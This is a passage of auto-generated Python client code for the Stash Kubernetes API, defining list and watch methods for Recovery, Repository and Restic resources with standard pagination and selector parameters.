['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1RecoveryList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_stash_appscode_com_v1alpha1_namespaced_repository(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
list or watch objects of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_repository(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
list or watch objects of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1RepositoryList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_stash_appscode_com_v1alpha1_namespaced_restic(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
list or watch objects of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_restic(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1ResticList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
list or watch objects of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1ResticList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1ResticList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces # noqa: E501
list or watch objects of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces # noqa: E501
list or watch objects of kind Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RecoveryList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_recovery_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/recoveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1RecoveryList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_stash_appscode_com_v1alpha1_repository_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_repository_for_all_namespaces # noqa: E501
list or watch objects of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_repository_for_all_namespaces # noqa: E501
list or watch objects of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_repository_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1RepositoryList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_repository_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1RepositoryList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
